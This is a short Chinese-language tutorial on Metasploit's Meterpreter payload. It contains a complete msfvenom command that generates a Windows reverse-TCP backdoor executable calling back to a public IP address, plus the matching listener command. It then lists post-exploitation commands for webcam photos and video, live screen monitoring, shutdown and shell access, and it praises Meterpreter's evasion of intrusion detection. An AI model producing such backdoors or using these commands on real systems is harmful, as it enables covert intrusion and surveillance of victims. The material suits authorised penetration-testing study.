MSF之meterpreter

429 阅读2分钟

meterpreter

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统,在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

MsfVenom使用

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

windows可执行程序后门:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=139.196.148.238 LPORT=4466 -a x64 --platform Windows -f exe > shell.exe

img image.png image.png

开启监听

handler -p windows/x64/meterpreter/reverse_tcp -H 120.27.231.204 -P 4466 image.png

输入sessions得到meterpreter

Meterpreter后渗透

Meterpreter

前面我们一直是在获取这么一个meterpreter,那么得到了meterpreter之后到底能够做什么呢。

metasploit 
back :退回 
jobs :查看后台监听 
jobs-k 1 :删除job 1 
sessions :查看会话列表 
sessions 1 :进入会话1 
sessions-k 1 :删除会话1

metepreter 
help: 查帮助信息 
background:当前会话放到后台 
exit:退出当前会话 
webcam list:查看摄像头 
webcam_snap:通过摄像头拍照 
webcam_stream:通过摄像头开启视频 
screenshot:获取屏幕截图 
screenshare:实时监控桌面 
shutdown:关闭目标机器 
shell执行命令